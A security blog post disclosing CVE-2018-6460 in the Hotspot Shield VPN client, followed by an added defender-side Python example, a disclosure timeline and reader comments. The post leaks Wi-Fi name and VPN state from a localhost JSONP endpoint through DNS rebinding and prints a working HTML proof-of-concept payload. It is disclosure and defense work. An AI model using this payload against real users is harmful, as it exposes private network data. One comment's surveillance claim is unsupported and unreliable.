Hotspot Shield CVE-2018-6460, Sensitive Information Disclosure with XSSI & DNS Rebinding



Lately, I've been interested in VPN clients. I was focusing my research on paid commercial VPN clients with 2M+ installs. One of the clients that stood out was Hotspot Shield, which ships similar builds on Android, Windows and Chrome, each carrying over 3M+ installs worldwide.


While analyzing this application, I noticed it's riddled with bugs that allow sensitive information disclosure. In this blog post, I will explore how it is possible to leak a user's data, such as which Wi-Fi network they are connected to, while they are using Hotspot Shield.

Update Feb 8th, 2018: Hotspot Shield has released a patch that fixes these issues in version 7.4.6.

Details

Hotspot Shield, when turned on, runs its own web server to communicate with its VPN client. The server listens on the hardcoded host 127.0.0.1 and port 895. It hosts vital JSONP endpoints that return multiple interesting values and configuration data.

For example, http://localhost:895/status.js generates a sensitive JSON response that reveals whether the user is connected to a VPN, which VPN server and network they are connected to, their country code, their network (Wi-Fi) name and other information. There are multiple other endpoints that return sensitive data, including configuration details.

$ curl -si http://127.0.0.1:895/status.js
HTTP/1.0 200 OK

{
"connect_state": "CONNECTED",
"daemon_state": {"timestamp": "1517471953", "state_name": "", "description": "HYDRA", "tun_ip": "[redacted]", "remote_ip": "[redacted]", "network_name": "shitcakes", "country_code": "ET"}
}

That endpoint is served without any authorization. On its own, status.js is a plain JSON endpoint, so there is no function to override, but when we send the parameter func with the value $_APPLOG.Rfunc, the server wraps the response in that function name, turning it into JSONP. We can obviously define that function in our malicious page and steal the contents, supplying a tm parameter with a timestamp, which the endpoint takes as a log time.


$_APPLOG.Rfunc({
"connect_state": "CONNECTED",
"daemon_state": {"timestamp": "1517471953", "state_name": "", "description": "HYDRA", "tun_ip": "[redacted]", "remote_ip": "[redacted]", "network_name": "shitcakes", "country_code": "ET"}
})

However, many might say this attack is limited to the LAN because of the server's address, but this is where we pull out an attack called DNS rebinding. In a DNS rebinding attack, any website can simply create a DNS name that it is authorized to communicate with and then make it resolve to localhost or 127.0.0.1, making the local service reachable from the WAN. I suggest you read Tavis Ormandy's bug on Blizzard here.
You can use https://lock.cmpxchg8b.com/rebinder.html to generate a host name for this. It can alternate between 127.0.0.1 and 191.241.34.54, for example.

Similar to Tavis' post, we now do the following to check:

$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 191.241.34.54
$ host 7f000001.c7f11de3.rbndr.us
7f000001.c7f11de3.rbndr.us has address 127.0.0.1

After the cached responses expire, resolution will alternate between those two IP addresses, and a page served from our rebound host name can steal the sensitive response with the following payload.

<!DOCTYPE html>
<html>
<head>
<script>
// Define the callback the JSONP response will invoke; the leaked object arrives as its argument.
var $_APPLOG = function() { return 1; }
$_APPLOG.Rfunc = function(leak){
   alert(JSON.stringify(leak));
}
</script>
</head>
<body>
<script>
   // Load status.js as a script with func set to our callback; tm is the log-time parameter.
   var head = document.getElementsByTagName('head')[0];
   var script = document.createElement('script');
   script.id = 'jsonp';
   script.src = 'http://127.0.0.1:895/status.js?func=$_APPLOG.Rfunc&tm=' + (new Date().getTime());
   head.appendChild(script);
</script>
</body>
</html>
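As an added, defender-side example (not Hotspot Shield's code), here is how a localhost service like the one on port 895 can refuse both halves of this attack: it rejects any Host header that is not the literal loopback address, which a rebound name such as 7f000001.c7f11de3.rbndr.us:895 fails, and it never reflects an arbitrary func value as a JSONP callback. Port 895, /status.js and the func parameter come from the post; the fixed callback name hssStatusCallback, the Sec-Fetch-Site check and the sample status values are assumptions.

```python
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

LISTEN_PORT = 895                                   # port from the post
ALLOWED_HOSTS = {"127.0.0.1:895", "localhost:895"}  # only literal loopback Host values
ALLOWED_CALLBACKS = {"hssStatusCallback"}           # hypothetical fixed callback name
JSON, JS = "application/json", "application/javascript"

# Constructed sample status; a real daemon would fill this in.
STATUS = {"connect_state": "CONNECTED",
          "daemon_state": {"network_name": "[redacted]", "country_code": "ET"}}

def host_header_allowed(host):
    """The browser sends the rebound name (7f000001....rbndr.us:895) in Host,
    so accepting only the literal loopback names blocks DNS rebinding."""
    return host is not None and host.lower() in ALLOWED_HOSTS

def evaluate_request(path, headers):
    """Return (status, content_type, body) for a GET of `path`."""
    h = {k.lower(): v for k, v in headers.items()}
    if not host_header_allowed(h.get("host")):
        return 403, JSON, json.dumps({"error": "bad host"})
    # Modern browsers tag cross-site <script src> loads; refuse them when tagged.
    if h.get("sec-fetch-site", "same-origin") not in ("same-origin", "none"):
        return 403, JSON, json.dumps({"error": "cross-site request"})
    url = urlparse(path)
    if url.path != "/status.js":
        return 404, JSON, json.dumps({"error": "not found"})
    func = parse_qs(url.query).get("func", [None])[0]
    if func is None:                    # plain JSON: not executable as a script
        return 200, JSON, json.dumps(STATUS)
    if func not in ALLOWED_CALLBACKS:   # never reflect $_APPLOG.Rfunc or any other name
        return 400, JSON, json.dumps({"error": "unknown callback"})
    return 200, JS, f"{func}({json.dumps(STATUS)});"

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        status, ctype, body = evaluate_request(self.path, dict(self.headers.items()))
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("X-Content-Type-Options", "nosniff")  # no MIME sniffing into script
        self.end_headers()
        self.wfile.write(body.encode())

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", LISTEN_PORT), Handler).serve_forever()
```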

Timeline

Mid November - multiple attempts to contact AnchorFree and HSS engineers.
Tue, Nov 28, 2017 - contacted Beyond Security's SSD for assistance with disclosure.
Sat, Jan 27, 2018 - Beyond Security confirms they've got neither a response nor an ETA for a fix.
Tue, Jan 30, 2018 - public disclosure as an SSD advisory (0day)
Wed, Jan 31, 2018 - CVE-2018-6460 assigned.
Wed, Feb 7th, 2018 - patch released with version 7.4.6


3 comments

  1. I just tried it and it worked. Soon after HSS did an auto-update, and now the url does not work anymore, browser says Connection Refused. That may not mean much, so perhaps you'd like to investigate again :-)

  2. The user reviews here on hss are very negative as well https://www.vpnmentor.com/reviews/hotspot-shield/

  3. There is already also evidence that HSS is also part of the US Surveillance Programs to spy on citizens around the globe: https://vpn-anbieter-vergleich-test.de/hotspotshield/ (sorry it is in German)
